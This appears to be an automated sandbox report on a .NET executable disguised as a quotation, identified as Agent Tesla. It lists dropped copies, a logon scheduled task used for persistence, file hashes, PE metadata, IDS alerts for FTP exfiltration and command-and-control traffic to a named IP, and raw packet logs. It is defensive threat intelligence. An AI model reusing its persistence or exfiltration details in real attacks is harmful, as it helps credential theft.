                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                      C:\Users\user\AppData\Local\Temp\tmp6606.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                      C:\Users\user\AppData\Roaming\pBBqGOzrz.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):645120
                                      Entropy (8bit):7.93913808186164
                                      Encrypted:false
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      MD5:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      SHA1:DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F
                                      SHA-256:FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162
                                      SHA-512:661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f................................. ........@.. .......................@............@.....................................W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d...0?......2....................................................0..A....... :........%.@...(.....A... .........%.'...(.....(...( ...*.....&*.....{....*"..}....*....0..h...............%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}....+..(.....*.0..{.............%.....(.................. ....... .-..... .,..... *=..... .7..... .+..... v...... .$....................( ...*.....&*..0..Y.......~A.....~(.....+Z..E................m...4....

                                      C:\Users\user\AppData\Roaming\pBBqGOzrz.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):645120
                                      Entropy (8bit):7.93913808186164
                                      Encrypted:false
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      MD5:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      SHA1:DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F
                                      SHA-256:FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162
                                      SHA-512:661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f................................. ........@.. .......................@............@.....................................W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d...0?......2....................................................0..A....... :........%.@...(.....A... .........%.'...(.....(...( ...*.....&*.....{....*"..}....*....0..h...............%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}....+..(.....*.0..{.............%.....(.................. ....... .-..... .,..... *=..... .7..... .+..... v...... .$....................( ...*.....&*..0..Y.......~A.....~(.....+Z..E................m...4....

                                      C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.93913808186164
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:rQuotation3200025006.exe
                                      File size:645'120 bytes
                                      MD5:36c4bff0f1cdcda62da9229500ca1e38
                                      SHA1:de74dbf7bac85a3a06c7038a4d4241389e6a5c8f
                                      SHA256:fda83ecb5bd6a07dedaf6be0fce7c626e21e9df94d82ddb905460e9d6a25a162
                                      SHA512:661cdee4efe389dac6ab7d8f5cf92a04403e7b6934942e18b4d2e5a7c609df58eea44d2e85ebb9592bf8544bc89c543cc7f01a2e67e0d1041aa22654ccbf124c
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      TLSH:59D423CC77AA8E36EA7C87B60462541813F364C59213FA0D5F8A35CA2E577CCA589F13
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f................................. ........@.. .......................@............@................................

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0x49edee
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66F622F9 [Fri Sep 27 03:14:01 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9ed940x57.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x600.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x9cdf40x9ce00e78b011486a082e9197e2d965fb514b0False0.9600550921314741data7.946103748533992IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xa00000x6000x60073346f2547818793e4e1f6f605b9d794False0.4225260416666667data4.11143285591599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xa20000xc0x200b70c11876092b370c3eeffc8aa726bbcFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0xa00900x32cdata0.42980295566502463
                                      RT_MANIFEST0xa03cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-27T13:10:17.718048+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449741110.4.45.19721TCP
                                      2024-09-27T13:10:19.571041+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19753334TCP
                                      2024-09-27T13:10:19.576306+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19753334TCP
                                      2024-09-27T13:10:24.710806+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449751110.4.45.19721TCP
                                      2024-09-27T13:10:25.537921+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753110.4.45.19751497TCP
                                      2024-09-27T13:10:25.543689+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753110.4.45.19751497TCP
                                      2024-09-27T13:10:31.146663+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449756110.4.45.19721TCP
                                      2024-09-27T13:10:31.976691+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449757110.4.45.19755730TCP
                                      2024-09-27T13:10:31.982121+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449757110.4.45.19755730TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 13:10:02.316216946 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:02.316262960 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:02.316363096 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:02.366570950 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:02.366595030 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:02.928730011 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:02.928808928 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:02.932893038 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:02.932904959 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:02.934041977 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:02.997900963 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:03.790529013 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:03.831480980 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:03.900651932 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:03.900799036 CEST44349733104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:03.900868893 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:04.157330036 CEST49733443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:07.076766014 CEST4973621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:07.081787109 CEST2149736110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:07.081937075 CEST4973621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:07.134562016 CEST4973621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:07.139583111 CEST2149736110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:07.139667988 CEST4973621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:07.426703930 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:07.432915926 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:07.433006048 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:08.907953024 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:08.908003092 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:08.908032894 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:08.908128977 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:08.908215046 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:08.908216000 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:08.913192034 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.235133886 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.235284090 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:09.240219116 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.609087944 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.609256983 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:09.614214897 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.939069033 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:09.942521095 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:09.947500944 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.269857883 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.270051003 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:10.275121927 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.596981049 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.599124908 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:10.604007959 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.925662041 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.927442074 CEST4973853694192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:10.932336092 CEST5369449738110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:10.933264017 CEST4973853694192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:10.933353901 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:10.938177109 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.762018919 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.818424940 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:11.823148966 CEST4973853694192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:11.823651075 CEST4973853694192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:11.828017950 CEST5369449738110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.828027010 CEST5369449738110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.828037024 CEST5369449738110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.828672886 CEST5369449738110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:11.828742027 CEST4973853694192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:12.151508093 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:12.152465105 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:12.157346964 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:12.479223013 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:12.479662895 CEST4973953786192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:12.484497070 CEST5378649739110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:12.484592915 CEST4973953786192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:12.484707117 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:12.489475965 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:12.653898954 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:12.653965950 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:12.654089928 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:12.658118010 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:12.658150911 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.122411013 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.122508049 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.124608040 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.124618053 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.124998093 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.177814007 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.247605085 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.295420885 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.321419954 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:13.321685076 CEST4973953786192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:13.326834917 CEST5378649739110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:13.326910019 CEST4973953786192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:13.353102922 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.353228092 CEST44349740104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:13.353522062 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.355443954 CEST49740443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:13.365302086 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:13.884481907 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:13.885103941 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:13.885153055 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:14.658535957 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:14.757188082 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:14.757277966 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:15.600683928 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:15.600987911 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:15.605936050 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:15.931091070 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:15.935343027 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:15.940515041 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:16.301481962 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:16.301673889 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:16.306566954 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:16.631720066 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:16.631902933 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:16.636815071 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:16.961774111 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.005969048 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.045949936 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.050843000 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.376188993 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.382038116 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.386898994 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.711987972 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.712822914 CEST4974653334192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.717789888 CEST5333449746110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:17.717855930 CEST4974653334192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.718048096 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:17.722975016 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:18.820713043 CEST49748443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:18.820749998 CEST44349748104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:18.820830107 CEST49748443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:18.823816061 CEST49748443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:18.823827982 CEST44349748104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:19.570696115 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.570862055 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.570960045 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.571041107 CEST4974653334192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.571049929 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.571101904 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.571192980 CEST4974653334192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.571302891 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.574316025 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.575839043 CEST5333449746110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.576230049 CEST5333449746110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.576306105 CEST4974653334192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:19.901110888 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:19.943479061 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:20.025316954 CEST44349748104.26.12.205192.168.2.4
